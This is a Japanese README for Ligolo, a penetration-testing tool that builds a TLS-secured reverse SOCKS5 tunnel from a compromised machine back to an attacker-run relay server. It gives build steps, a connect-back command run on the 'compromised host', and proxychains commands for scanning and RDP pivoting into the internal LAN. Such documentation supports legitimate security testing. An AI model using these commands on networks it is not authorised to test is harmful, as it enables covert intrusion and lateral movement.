
ペンテスターのためにペンテスターが作ったリバーストンネリングを簡単に https://sysdream.com/

Ligoloは、リバースコネクションからSOCKS5またはTCPトンネルを完全に安全に(楕円曲線を使用したTLS証明書)確立するためのシンプルで軽量なツールです。
Autoroute + Socks4aを使用したMeterpreterに匹敵しますが、より安定していて高速です。
外部監査中にWindows/Linux/Macサーバーを侵害しました。このサーバーはLANネットワーク内にあり、このネットワーク上の他のマシンへの接続を確立したい場合。
Ligoloは、内部サーバーのリソースにアクセスするためのトンネルを設定できます。
Proxychainsを使用したRDP接続の中継(WAN)。

以下は、2台の100mb/sホスト間(ligolo / localrelay)のスピードテストのスクリーンショットです。パフォーマンスはシステムとネットワーク構成により異なる場合があります。

Goがインストールされ、動作していることを確認してください。
cd `go env GOPATH`/src
git clone https://github.com/sysdream/ligolo
cd ligolo
make dep
make certs TLS_HOST=example.com
注意:buildを呼び出す際にTLS_CERT makeオプションを使用して、独自の証明書を使用することもできます。例:make build-all TLS_CERT=certs/mycert.pem。
make build-all
make build
Ligoloは2つのモジュールで構成されています:
Localrelayはコントロールサーバー(攻撃者サーバー)で起動することを目的としています。
Ligoloはターゲットコンピュータで実行するプログラムです。
Localrelayはデフォルトオプションのままにしておくことができます。すべてのインターフェースのポート5555でリッスンし、ligoloからの接続を待ちます(-relayserverパラメータ)。
Ligoloでは、-relayserver ip:portパラメータを使用してリレーサーバー(または攻撃サーバー)のIPアドレスを指定する必要があります。
ヘルプを表示するには-hオプションを使用してください。
LigoloとLocalRelay間の接続が確立されると、リレーサーバー上のTCPポート1080にSOCKS5プロキシがセットアップされます(-localserverオプションでTCPアドレス/ポートを変更できます)。
その後は、お好みのツール(例:Proxychains)を使用して、クライアントのLANネットワークを探索するだけです。
攻撃サーバーで:
./bin/localrelay_linux_amd64
侵害されたホストで:
> ligolo_windows_amd64.exe -relayserver LOCALRELAYSERVER:5555
接続が確立されたら、攻撃サーバーのProxyChains設定ファイルに以下のパラメータを設定します:
[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
socks5 127.0.0.1 1080
成果を得る:
$ proxychains nmap -sT 10.0.0.0/24 -p 80 -Pn -A
$ proxychains rdesktop 10.0.0.123
Localrelay オプション:
Usage of localrelay:
-certfile string
TLSサーバー証明書 (デフォルト "certs/server.crt")
-keyfile string
TLSサーバーキー (デフォルト "certs/server.key")
-localserver string
ローカルサーバーアドレス (あなたのproxychainsパラメータ) (デフォルト "127.0.0.1:1080")
-relayserver string
リレーサーバーリッスンアドレス (コネクトバックアドレス) (デフォルト "0.0.0.0:5555")
Ligolo オプション:
Usage of ligolo:
-autorestart
例外発生時に再接続を試みる
-relayserver string
リレーサーバー (コネクトバックアドレス) (デフォルト "127.0.0.1:5555")
-skipverify
TLS証明書ピン留め検証をスキップ
-targetserver string
宛先サーバー (RDPクライアント、SSHサーバーなど) - 指定しない場合、Ligoloはsocks5プロキシサーバーを起動
GNU General Public License v3.0(LICENSING参照)。